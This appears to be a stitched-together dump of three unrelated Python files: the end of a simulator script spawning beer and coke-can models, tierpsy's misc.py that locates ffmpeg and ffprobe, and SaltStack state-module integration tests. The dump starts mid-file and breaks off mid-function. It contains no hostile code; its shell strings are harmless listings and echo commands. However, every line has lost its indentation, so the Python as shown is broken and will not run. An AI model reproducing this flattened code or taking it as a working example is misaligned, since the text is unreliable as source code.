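# Each model passed to spawn_object() is a 3-item sequence:
# [entity name, path to the SDF file whose XML is sent in the request,
#  (x, y, z) initial pose], as illustrated by the beer/coke examples in main().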
def main():
beer = ["beer", "/root/robotic_arm/models/beer/model.sdf", (-0.5, 0.5, 0.)]
coke = ["coke_can", "/root/robotic_arm/models/coke_can/model.sdf", (0.5, .5, 0.)]
processes = []
processes.append(Process(target=spawn_object, args=(beer, )))
processes.append(Process(target=spawn_object, args=(coke, )))
for process in processes:
process.start()
for process in processes:
process.join()
if __name__ == '__main__':
main()
|
misc.py
|
import shutil
import sys
import os
import tables
import warnings
from threading import Thread
from queue import Queue, Empty
from tierpsy import AUX_FILES_DIR
# get the correct path for ffmpeg. First we look in the aux
# directory, otherwise we look in the system path.
def get_local_or_sys_path(file_name):
file_source = os.path.join(AUX_FILES_DIR, file_name)
if not os.path.exists(file_source):
file_source = shutil.which(file_name)
if not file_source:
raise FileNotFoundError('command not found: %s' % file_name)
return file_source
try:
if sys.platform == 'win32':
FFMPEG_CMD = get_local_or_sys_path('ffmpeg.exe')
elif sys.platform == 'darwin':
FFMPEG_CMD = get_local_or_sys_path('ffmpeg22')
elif sys.platform == 'linux':
FFMPEG_CMD = get_local_or_sys_path('ffmpeg')
except FileNotFoundError:
FFMPEG_CMD = ''
warnings.warn('ffmpeg not found. This might cause problems while reading .mjpeg files.')
# get the correct path for ffprobe. First we look in the aux
# directory, otherwise we look in the system path.
try:
if os.name == 'nt':
FFPROBE_CMD = get_local_or_sys_path('ffprobe.exe')
else:
FFPROBE_CMD = get_local_or_sys_path('ffprobe')
except FileNotFoundError:
FFPROBE_CMD = ''
warnings.warn('ffprobe not found. This might cause problems while extracting the raw video timestamps.')
WLAB = {'U': 0, 'WORM': 1, 'WORMS': 2, 'BAD': 3, 'GOOD_SKE': 4}
# pytables filters.
TABLE_FILTERS = tables.Filters(
complevel=5,
complib='zlib',
shuffle=True,
fletcher32=True)
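# Usage sketch (illustrative, not part of the original module): these filters
# are intended to be passed when creating compressed HDF5 datasets, e.g.
#   with tables.open_file('features.hdf5', 'w') as fid:
#       fid.create_carray('/', 'mask', obj=some_array, filters=TABLE_FILTERS)
# where 'features.hdf5' and some_array are hypothetical examples.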
def print_flush(msg):
print(msg)
sys.stdout.flush()
class ReadEnqueue():
def __init__(self, pipe, timeout=-1):
def _target_fun(out, queue):
for line in iter(out.readline, b''):
queue.put(line)
out.close()
self.timeout = timeout
self.queue = Queue()
self.thread = Thread(target=_target_fun, args=(pipe, self.queue))
self.thread.start()
def read(self):
try:
if self.timeout > 0:
line = self.queue.get(timeout=self.timeout)
else:
line = self.queue.get_nowait()
line = line.decode("utf-8")
except Empty:
line = None
return line
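# ReadEnqueue usage sketch (illustrative only): it wraps a pipe so a caller can
# poll for complete lines without blocking, which is how ffmpeg/ffprobe output
# is typically consumed. The command below is a hypothetical example.
#   import subprocess
#   proc = subprocess.Popen([FFPROBE_CMD, '-show_frames', 'video.mjpg'],
#                           stdout=subprocess.PIPE)
#   reader = ReadEnqueue(proc.stdout, timeout=1)
#   while proc.poll() is None:
#       line = reader.read()
#       if line is not None:
#           print_flush(line.rstrip())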
|
test_state.py
|
# -*- coding: utf-8 -*-
# Import python libs
from __future__ import absolute_import
import os
import shutil
import textwrap
import threading
import time
# Import Salt Testing libs
from tests.support.case import ModuleCase
from tests.support.unit import skipIf
from tests.support.paths import TMP
from tests.support.mixins import SaltReturnAssertsMixin
# Import salt libs
import salt.utils
from salt.modules.virtualenv_mod import KNOWN_BINARY_NAMES
# Import 3rd-party libs
import salt.ext.six as six
class StateModuleTest(ModuleCase, SaltReturnAssertsMixin):
'''
Validate the state module
'''
maxDiff = None
def test_show_highstate(self):
'''
state.show_highstate
'''
high = self.run_function('state.show_highstate')
destpath = os.path.join(TMP, 'testfile')
self.assertTrue(isinstance(high, dict))
self.assertTrue(destpath in high)
self.assertEqual(high[destpath]['__env__'], 'base')
def test_show_lowstate(self):
'''
state.show_lowstate
'''
low = self.run_function('state.show_lowstate')
self.assertTrue(isinstance(low, list))
self.assertTrue(isinstance(low[0], dict))
def test_catch_recurse(self):
'''
state.show_sls used to catch a recursive ref
'''
err = self.run_function('state.sls', mods='recurse_fail')
self.assertIn('recursive', err[0])
def test_no_recurse(self):
'''
verify that a sls structure is NOT a recursive ref
'''
sls = self.run_function('state.show_sls', mods='recurse_ok')
self.assertIn('snmpd', sls)
def test_no_recurse_two(self):
'''
verify that a sls structure is NOT a recursive ref
'''
sls = self.run_function('state.show_sls', mods='recurse_ok_two')
self.assertIn('/etc/nagios/nrpe.cfg', sls)
def test_running_dictionary_consistency(self):
'''
Test the structure of the running dictionary so we don't change it
without deprecating/documenting the change
'''
running_dict_fields = [
'__id__',
'__run_num__',
'__sls__',
'changes',
'comment',
'duration',
'name',
'result',
'start_time',
]
sls = self.run_function('state.single',
fun='test.succeed_with_changes',
name='gndn')
for state, ret in sls.items():
for field in running_dict_fields:
self.assertIn(field, ret)
def test_running_dictionary_key_sls(self):
'''
Ensure the __sls__ key is either null or a string
'''
sls1 = self.run_function('state.single',
fun='test.succeed_with_changes',
name='gndn')
sls2 = self.run_function('state.sls', mods='gndn')
for state, ret in sls1.items():
self.assertTrue(isinstance(ret['__sls__'], type(None)))
for state, ret in sls2.items():
self.assertTrue(isinstance(ret['__sls__'], str))
def _remove_request_cache_file(self):
'''
remove minion state request file
'''
cache_file = os.path.join(self.get_config('minion')['cachedir'], 'req_state.p')
if os.path.exists(cache_file):
os.remove(cache_file)
def test_request(self):
'''
verify sending a state request to the minion(s)
'''
self._remove_request_cache_file()
ret = self.run_function('state.request', mods='modules.state.requested')
result = ret['cmd_|-count_root_dir_contents_|-ls -a / | wc -l_|-run']['result']
self.assertEqual(result, None)
def test_check_request(self):
'''
verify checking a state request sent to the minion(s)
'''
self._remove_request_cache_file()
self.run_function('state.request', mods='modules.state.requested')
ret = self.run_function('state.check_request')
result = ret['default']['test_run']['cmd_|-count_root_dir_contents_|-ls -a / | wc -l_|-run']['result']
self.assertEqual(result, None)
def test_clear_request(self):
'''
verify clearing a state request sent to the minion(s)
'''
self._remove_request_cache_file()
self.run_function('state.request', mods='modules.state.requested')
ret = self.run_function('state.clear_request')
self.assertTrue(ret)
def test_run_request_succeeded(self):
'''
verify running a state request sent to the minion(s)
'''
self._remove_request_cache_file()
if salt.utils.is_windows():
self.run_function('state.request', mods='modules.state.requested_win')
else:
self.run_function('state.request', mods='modules.state.requested')
ret = self.run_function('state.run_request')
if salt.utils.is_windows():
key = 'cmd_|-count_root_dir_contents_|-Get-ChildItem C:\\\\ | Measure-Object | %{$_.Count}_|-run'
else:
key = 'cmd_|-count_root_dir_contents_|-ls -a / | wc -l_|-run'
result = ret[key]['result']
self.assertTrue(result)
def test_run_request_failed_no_request_staged(self):
'''
verify not running a state request sent to the minion(s)
'''
self._remove_request_cache_file()
self.run_function('state.request', mods='modules.state.requested')
self.run_function('state.clear_request')
ret = self.run_function('state.run_request')
self.assertEqual(ret, {})
def test_issue_1896_file_append_source(self):
'''
Verify that we can append a file's contents
'''
testfile = os.path.join(TMP, 'test.append')
if os.path.isfile(testfile):
os.unlink(testfile)
ret = self.run_function('state.sls', mods='testappend')
self.assertSaltTrueReturn(ret)
ret = self.run_function('state.sls', mods='testappend.step-1')
self.assertSaltTrueReturn(ret)
ret = self.run_function('state.sls', mods='testappend.step-2')
self.assertSaltTrueReturn(ret)
with salt.utils.fopen(testfile, 'r') as fp_:
testfile_contents = fp_.read()
contents = textwrap.dedent('''\
# set variable identifying the chroot you work in (used in the prompt below)
if [ -z "$debian_chroot" ] && [ -r /etc/debian_chroot ]; then
debian_chroot=$(cat /etc/debian_chroot)
fi
''')
if not salt.utils.is_windows():
contents += os.linesep
contents += textwrap.dedent('''\
# enable bash completion in interactive shells
if [ -f /etc/bash_completion ] && ! shopt -oq posix; then
. /etc/bash_completion
fi
''')
if salt.utils.is_windows():
new_contents = contents.splitlines()
contents = os.linesep.join(new_contents)
contents += os.linesep
self.assertMultiLineEqual(
contents, testfile_contents)
# Re-append switching order
ret = self.run_function('state.sls', mods='testappend.step-2')
self.assertSaltTrueReturn(ret)
ret = self.run_function('state.sls', mods='testappend.step-1')
self.assertSaltTrueReturn(ret)
with salt.utils.fopen(testfile, 'r') as fp_:
testfile_contents = fp_.read()
self.assertMultiLineEqual(contents, testfile_contents)
def test_issue_1876_syntax_error(self):
'''
verify that we catch the following syntax error::
/tmp/salttest/issue-1876:
file:
- managed
- source: salt://testfile
file.append:
- text: foo
'''
testfile = os.path.join(TMP, 'issue-1876')
sls = self.run_function('state.sls', mods='issue-1876')
self.assertIn(
'ID \'{0}\' in SLS \'issue-1876\' contains multiple state '
'declarations of the same type'.format(testfile),
sls
)
def test_issue_1879_too_simple_contains_check(self):
expected = textwrap.dedent('''\
# set variable identifying the chroot you work in (used in the prompt below)
if [ -z "$debian_chroot" ] && [ -r /etc/debian_chroot ]; then
debian_chroot=$(cat /etc/debian_chroot)
fi
# enable bash completion in interactive shells
if [ -f /etc/bash_completion ] && ! shopt -oq posix; then
. /etc/bash_completion
fi
''')
if salt.utils.is_windows():
new_contents = expected.splitlines()
expected = os.linesep.join(new_contents)
expected += os.linesep
testfile = os.path.join(TMP, 'issue-1879')
# Delete it if it already exists
if os.path.isfile(testfile):
os.unlink(testfile)
# Create the file
ret = self.run_function('state.sls', mods='issue-1879', timeout=120)
self.assertSaltTrueReturn(ret)
# The first append
ret = self.run_function(
'state.sls', mods='issue-1879.step-1', timeout=120
)
self.assertSaltTrueReturn(ret)
# The second append
ret = self.run_function(
'state.sls', mods='issue-1879.step-2', timeout=120
)
self.assertSaltTrueReturn(ret)
# Does it match?
try:
with salt.utils.fopen(testfile, 'r') as fp_:
contents = fp_.read()
self.assertMultiLineEqual(expected, contents)
# Make sure we don't re-append existing text
ret = self.run_function(
'state.sls', mods='issue-1879.step-1', timeout=120
)
self.assertSaltTrueReturn(ret)
ret = self.run_function(
'state.sls', mods='issue-1879.step-2', timeout=120
)
self.assertSaltTrueReturn(ret)
with salt.utils.fopen(testfile, 'r') as fp_:
contents = fp_.read()
self.assertMultiLineEqual(expected, contents)
except Exception:
if os.path.exists(testfile):
shutil.copy(testfile, testfile + '.bak')
raise
finally:
if os.path.exists(testfile):
os.unlink(testfile)
def test_include(self):
fnames = (
os.path.join(TMP, 'include-test'),
os.path.join(TMP, 'to-include-test')
)
exclude_test_file = os.path.join(
TMP, 'exclude-test'
)
try:
ret = self.run_function('state.sls', mods='include-test')
self.assertSaltTrueReturn(ret)
for fname in fnames:
self.assertTrue(os.path.isfile(fname))
self.assertFalse(os.path.isfile(exclude_test_file))
finally:
for fname in list(fnames) + [exclude_test_file]:
if os.path.isfile(fname):
os.remove(fname)
def test_exclude(self):
fnames = (
os.path.join(TMP, 'include-test'),
os.path.join(TMP, 'exclude-test')
)
to_include_test_file = os.path.join(
TMP, 'to-include-test'
)
try:
ret = self.run_function('state.sls', mods='exclude-test')
self.assertSaltTrueReturn(ret)
for fname in fnames:
self.assertTrue(os.path.isfile(fname))
self.assertFalse(os.path.isfile(to_include_test_file))
finally:
for fname in list(fnames) + [to_include_test_file]:
if os.path.isfile(fname):
os.remove(fname)
@skipIf(salt.utils.which_bin(KNOWN_BINARY_NAMES) is None, 'virtualenv not installed')
def test_issue_2068_template_str(self):
venv_dir = os.path.join(
TMP, 'issue-2068-template-str'
)
try:
ret = self.run_function(
'state.sls', mods='issue-2068-template-str-no-dot',
timeout=120
)
self.assertSaltTrueReturn(ret)
finally:
if os.path.isdir(venv_dir):
shutil.rmtree(venv_dir)
# Let's load the template from the filesystem. If running this state
# with state.sls works, so should using state.template_str
template_path = os.path.join(
os.path.dirname(os.path.dirname(__file__)),
'files', 'file', 'base', 'issue-2068-template-str-no-dot.sls'
)
with salt.utils.fopen(template_path, 'r') as fp_:
template = fp_.read()
ret = self.run_function(
'state.template_str', [template], timeout=120
)
self.assertSaltTrueReturn(ret)
# Now using state.template
ret = self.run_function(
'state.template', [template_path], timeout=120
)
self.assertSaltTrueReturn(ret)
# Now the problematic #2068 including dot's
ret = self.run_function(
'state.sls', mods='issue-2068-template-str', timeout=120
)
self.assertSaltTrueReturn(ret)
# Let's load the template from the filesystem. If running this state
# with state.sls works, so should using state.template_str
template_path = os.path.join(
os.path.dirname(os.path.dirname(__file__)),
'files', 'file', 'base', 'issue-2068-template-str.sls'
)
with salt.utils.fopen(template_path, 'r') as fp_:
template = fp_.read()
ret = self.run_function(
'state.template_str', [template], timeout=120
)
self.assertSaltTrueReturn(ret)
# Now using state.template
ret = self.run_function(
'state.template', [template_path], timeout=120
)
self.assertSaltTrueReturn(ret)
def test_template_invalid_items(self):
TEMPLATE = textwrap.dedent('''\
{0}:
- issue-2068-template-str
/tmp/test-template-invalid-items:
file:
- managed
- source: salt://testfile
''')
for item in ('include', 'exclude', 'extends'):
ret = self.run_function(
'state.template_str', [TEMPLATE.format(item)]
)
self.assertTrue(isinstance(ret, list))
self.assertNotEqual(ret, [])
self.assertEqual(
['The \'{0}\' declaration found on \'<template-str>\' is '
'invalid when rendering single templates'.format(item)],
ret
)
def test_pydsl(self):
'''
Test the basics of the pydsl
'''
ret = self.run_function('state.sls', mods='pydsl-1')
self.assertSaltTrueReturn(ret)
def test_issues_7905_and_8174_sls_syntax_error(self):
'''
Call sls file with yaml syntax error.
Ensure these errors are detected and presented to the user without
stack traces.
'''
ret = self.run_function('state.sls', mods='syntax.badlist')
self.assertEqual(ret, [
'State \'A\' in SLS \'syntax.badlist\' is not formed as a list'
])
ret = self.run_function('state.sls', mods='syntax.badlist2')
self.assertEqual(ret, [
'State \'C\' in SLS \'syntax.badlist2\' is not formed as a list'
])
def test_requisites_mixed_require_prereq_use(self):
'''
Call sls file containing several requisites.
'''
expected_simple_result = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 2,
'comment': 'Command "echo A" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 1,
'comment': 'Command "echo B" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C_|-run': {
'__run_num__': 0,
'comment': 'Command "echo C" run',
'result': True,
'changes': True}
}
expected_result = {
'cmd_|-A_|-echo A fifth_|-run': {
'__run_num__': 4,
'comment': 'Command "echo A fifth" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo B third" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C second" run',
'result': True,
'changes': True},
'cmd_|-D_|-echo D first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo D first" run',
'result': True,
'changes': True},
'cmd_|-E_|-echo E fourth_|-run': {
'__run_num__': 3,
'comment': 'Command "echo E fourth" run',
'result': True,
'changes': True}
}
expected_req_use_result = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 1,
'comment': 'Command "echo A" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 4,
'comment': 'Command "echo B" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C_|-run': {
'__run_num__': 0,
'comment': 'Command "echo C" run',
'result': True,
'changes': True},
'cmd_|-D_|-echo D_|-run': {
'__run_num__': 5,
'comment': 'Command "echo D" run',
'result': True,
'changes': True},
'cmd_|-E_|-echo E_|-run': {
'__run_num__': 2,
'comment': 'Command "echo E" run',
'result': True,
'changes': True},
'cmd_|-F_|-echo F_|-run': {
'__run_num__': 3,
'comment': 'Command "echo F" run',
'result': True,
'changes': True}
}
ret = self.run_function('state.sls', mods='requisites.mixed_simple')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_simple_result, result)
# test Traceback recursion prereq+require #8785
# TODO: this is actually failing badly
#ret = self.run_function('state.sls', mods='requisites.prereq_require_recursion_error2')
#self.assertEqual(
# ret,
# ['A recursive requisite was found, SLS "requisites.prereq_require_recursion_error2" ID "B" ID "A"']
#)
# test Infinite recursion prereq+require #8785 v2
# TODO: this is actually failing badly
#ret = self.run_function('state.sls', mods='requisites.prereq_require_recursion_error3')
#self.assertEqual(
# ret,
# ['A recursive requisite was found, SLS "requisites.prereq_require_recursion_error2" ID "B" ID "A"']
#)
# test Infinite recursion prereq+require #8785 v3
# TODO: this is actually failing badly, and expected result is maybe not a recursion
#ret = self.run_function('state.sls', mods='requisites.prereq_require_recursion_error4')
#self.assertEqual(
# ret,
# ['A recursive requisite was found, SLS "requisites.prereq_require_recursion_error2" ID "B" ID "A"']
#)
# undetected infinite loops prevent this test from running...
# TODO: this is actually failing badly
#ret = self.run_function('state.sls', mods='requisites.mixed_complex1')
#result = self.normalize_ret(ret)
#self.assertEqual(expected_result, result)
def normalize_ret(self, ret):
'''
Normalize the return to the format that we'll use for result checking
'''
result = {}
for item, descr in six.iteritems(ret):
result[item] = {
'__run_num__': descr['__run_num__'],
'comment': descr['comment'],
'result': descr['result'],
'changes': descr['changes'] != {}  # whether there were any changes
}
return result
def test_requisites_require_ordering_and_errors(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
expected_result = {
'cmd_|-A_|-echo A fifth_|-run': {
'__run_num__': 4,
'comment': 'Command "echo A fifth" run',
'result': True,
'changes': True,
},
'cmd_|-B_|-echo B second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo B second" run',
'result': True,
'changes': True,
},
'cmd_|-C_|-echo C third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo C third" run',
'result': True,
'changes': True,
},
'cmd_|-D_|-echo D first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo D first" run',
'result': True,
'changes': True,
},
'cmd_|-E_|-echo E fourth_|-run': {
'__run_num__': 3,
'comment': 'Command "echo E fourth" run',
'result': True,
'changes': True,
},
'cmd_|-F_|-echo F_|-run': {
'__run_num__': 5,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' foobar: A\n',
'result': False,
'changes': False,
},
'cmd_|-G_|-echo G_|-run': {
'__run_num__': 6,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' cmd: Z\n',
'result': False,
'changes': False,
},
'cmd_|-H_|-echo H_|-run': {
'__run_num__': 7,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' cmd: Z\n',
'result': False,
'changes': False,
}
}
ret = self.run_function('state.sls', mods='requisites.require')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
ret = self.run_function('state.sls', mods='requisites.require_error1')
self.assertEqual(ret, [
"Cannot extend ID 'W' in 'base:requisites.require_error1'. It is not part of the high state.\nThis is likely due to a missing include statement or an incorrectly typed ID.\nEnsure that a state with an ID of 'W' is available\nin environment 'base' and to SLS 'requisites.require_error1'"
])
# issue #8235
# FIXME: Why is require enforcing list syntax while require_in does not?
# And why prevent it?
# Currently this state fails, should return C/B/A
result = {}
ret = self.run_function('state.sls', mods='requisites.require_simple_nolist')
self.assertEqual(ret, [
'The require statement in state \'B\' in SLS '
+ '\'requisites.require_simple_nolist\' needs to be formed as a list'
])
# commented until a fix is made for issue #8772
# TODO: this test actually fails
#ret = self.run_function('state.sls', mods='requisites.require_error2')
#self.assertEqual(ret, [
# 'Cannot extend state foobar for ID A in "base:requisites.require_error2".'
# + ' It is not part of the high state.'
#])
ret = self.run_function('state.sls', mods='requisites.require_recursion_error1')
self.assertEqual(
ret,
['A recursive requisite was found, SLS "requisites.require_recursion_error1" ID "B" ID "A"']
)
def test_requisites_full_sls(self):
'''
Test the sls special command in requisites
'''
expected_result = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 2,
'comment': 'Command "echo A" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C" run',
'result': True,
'changes': True},
}
ret = self.run_function('state.sls', mods='requisites.fullsls_require')
self.assertReturnNonEmptySaltType(ret)
result = self.normalize_ret(ret)
self.assertEqual(expected_result, result)
# issue #8233: traceback on prereq sls
# TODO: not done
#ret = self.run_function('state.sls', mods='requisites.fullsls_prereq')
#self.assertEqual(['sls command can only be used with require requisite'], ret)
def test_requisites_full_sls_require_in(self):
'''
Test require_in when including an entire sls
'''
expected_result = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 0,
'comment': 'Command "echo A" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 1,
'comment': 'Command "echo B" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C_|-run': {
'__run_num__': 2,
'comment': 'Command "echo C" run',
'result': True,
'changes': True},
}
ret = self.run_function('state.sls',
mods='requisites.fullsls_require_in')
self.assertReturnNonEmptySaltType(ret)
result = self.normalize_ret(ret)
self.assertEqual(expected_result, result)
def test_requisites_full_sls_import(self):
'''
Test full sls requisite with nothing but an import
'''
ret = self.run_function('state.sls', mods='requisites.fullsls_require_import')
self.assertSaltTrueReturn(ret)
def test_requisites_prereq_simple_ordering_and_errors(self):
'''
Call sls file containing several prereq_in and prereq.
Ensure that some of them are failing and that the order is right.
'''
expected_result_simple = {
'cmd_|-A_|-echo A third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo A third" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B first" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C second" run',
'result': True,
'changes': True},
'cmd_|-I_|-echo I_|-run': {
'__run_num__': 3,
'comment': 'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' cmd: Z\n',
'result': False,
'changes': False},
'cmd_|-J_|-echo J_|-run': {
'__run_num__': 4,
'comment': 'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' foobar: A\n',
'result': False,
'changes': False}
}
expected_result_simple2 = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 1,
'comment': 'Command "echo A" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 2,
'comment': 'Command "echo B" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C_|-run': {
'__run_num__': 0,
'comment': 'Command "echo C" run',
'result': True,
'changes': True},
'cmd_|-D_|-echo D_|-run': {
'__run_num__': 3,
'comment': 'Command "echo D" run',
'result': True,
'changes': True},
'cmd_|-E_|-echo E_|-run': {
'__run_num__': 4,
'comment': 'Command "echo E" run',
'result': True,
'changes': True}
}
expected_result_simple3 = {
'cmd_|-A_|-echo A first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo A first" run',
'result': True,
'changes': True,
},
'cmd_|-B_|-echo B second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo B second" run',
'result': True,
'changes': True,
},
'cmd_|-C_|-echo C third_|-wait': {
'__run_num__': 2,
'comment': '',
'result': True,
'changes': False,
}
}
expected_result_complex = {
'cmd_|-A_|-echo A fourth_|-run': {
'__run_num__': 3,
'comment': 'Command "echo A fourth" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B first" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C second" run',
'result': True,
'changes': True},
'cmd_|-D_|-echo D third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo D third" run',
'result': True,
'changes': True},
}
ret = self.run_function('state.sls', mods='requisites.prereq_simple')
self.assertReturnNonEmptySaltType(ret)
result = self.normalize_ret(ret)
self.assertEqual(expected_result_simple, result)
# same test, but not using lists in yaml syntax
# TODO: issue #8235, prereq ignored when not used in list syntax
# Currently fails badly with :
# TypeError encountered executing state.sls: string indices must be integers, not str.
#expected_result_simple.pop('cmd_|-I_|-echo I_|-run')
#expected_result_simple.pop('cmd_|-J_|-echo J_|-run')
#ret = self.run_function('state.sls', mods='requisites.prereq_simple_nolist')
#result = self.normalize_ret(ret)
#self.assertEqual(expected_result_simple, result)
ret = self.run_function('state.sls', mods='requisites.prereq_simple2')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result_simple2, result)
ret = self.run_function('state.sls', mods='requisites.prereq_simple3')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result_simple3, result)
#ret = self.run_function('state.sls', mods='requisites.prereq_error_nolist')
#self.assertEqual(
# ret,
# ['Cannot extend ID Z in "base:requisites.prereq_error_nolist".'
# + ' It is not part of the high state.']
#)
ret = self.run_function('state.sls', mods='requisites.prereq_compile_error1')
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(
ret['cmd_|-B_|-echo B_|-run']['comment'],
'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' foobar: A\n'
)
ret = self.run_function('state.sls', mods='requisites.prereq_compile_error2')
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(
ret['cmd_|-B_|-echo B_|-run']['comment'],
'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' foobar: C\n'
)
ret = self.run_function('state.sls', mods='requisites.prereq_complex')
result = self.normalize_ret(ret)
self.assertEqual(expected_result_complex, result)
# issue #8210 : prereq recursion undetected
# TODO: this test fails
#ret = self.run_function('state.sls', mods='requisites.prereq_recursion_error')
#self.assertEqual(
# ret,
# ['A recursive requisite was found, SLS "requisites.prereq_recursion_error" ID "B" ID "A"']
#)
def test_infinite_recursion_sls_prereq(self):
ret = self.run_function('state.sls', mods='requisites.prereq_sls_infinite_recursion')
self.assertSaltTrueReturn(ret)
def test_requisites_use(self):
'''
Call sls file containing several use_in and use.
'''
# TODO issue #8235 & #8774 some examples are still commented in the test file
ret = self.run_function('state.sls', mods='requisites.use')
self.assertReturnNonEmptySaltType(ret)
for item, descr in six.iteritems(ret):
self.assertEqual(descr['comment'], 'onlyif execution failed')
# TODO: issue #8802 : use recursions undetected
# issue is closed as use does not actually inherit requisites
        # if chain-use is added after #8774 is resolved, these tests might become useful
#ret = self.run_function('state.sls', mods='requisites.use_recursion')
#self.assertEqual(ret, [
# 'A recursive requisite was found, SLS "requisites.use_recursion"'
# + ' ID "B" ID "A"'
#])
#ret = self.run_function('state.sls', mods='requisites.use_recursion2')
#self.assertEqual(ret, [
# 'A recursive requisite was found, SLS "requisites.use_recursion2"'
# + ' ID "C" ID "A"'
#])
#ret = self.run_function('state.sls', mods='requisites.use_auto_recursion')
#self.assertEqual(ret, [
# 'A recursive requisite was found, SLS "requisites.use_recursion"'
# + ' ID "A" ID "A"'
#])
def test_get_file_from_env_in_top_match(self):
tgt = os.path.join(TMP, 'prod-cheese-file')
try:
ret = self.run_function(
'state.highstate', minion_tgt='sub_minion'
)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isfile(tgt))
with salt.utils.fopen(tgt, 'r') as cheese:
data = cheese.read()
self.assertIn('Gromit', data)
self.assertIn('Comte', data)
finally:
os.unlink(tgt)
# onchanges tests
def test_onchanges_requisite(self):
'''
Tests a simple state using the onchanges requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onchanges_simple')
# First, test the result of the state run when changes are expected to happen
test_data = state_run['cmd_|-test_changing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when changes are not expected to happen
test_data = state_run['cmd_|-test_non_changing_state_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because none of the onchanges reqs changed'
self.assertIn(expected_result, test_data)
def test_onchanges_requisite_multiple(self):
'''
Tests a simple state using the onchanges requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls',
mods='requisites.onchanges_multiple')
# First, test the result of the state run when two changes are expected to happen
test_data = state_run['cmd_|-test_two_changing_states_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when two changes are not expected to happen
test_data = state_run['cmd_|-test_two_non_changing_states_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because none of the onchanges reqs changed'
self.assertIn(expected_result, test_data)
# Finally, test the result of the state run when only one of the onchanges requisites changes.
test_data = state_run['cmd_|-test_one_changing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
def test_onchanges_in_requisite(self):
'''
Tests a simple state using the onchanges_in requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onchanges_in_simple')
# First, test the result of the state run of when changes are expected to happen
test_data = state_run['cmd_|-test_changes_expected_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when changes are not expected to happen
test_data = state_run['cmd_|-test_changes_not_expected_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because none of the onchanges reqs changed'
self.assertIn(expected_result, test_data)
# onfail tests
def test_onfail_requisite(self):
'''
Tests a simple state using the onfail requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onfail_simple')
# First, test the result of the state run when a failure is expected to happen
test_data = state_run['cmd_|-test_failing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when a failure is not expected to happen
test_data = state_run['cmd_|-test_non_failing_state_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because onfail req did not change'
self.assertIn(expected_result, test_data)
def test_multiple_onfail_requisite(self):
'''
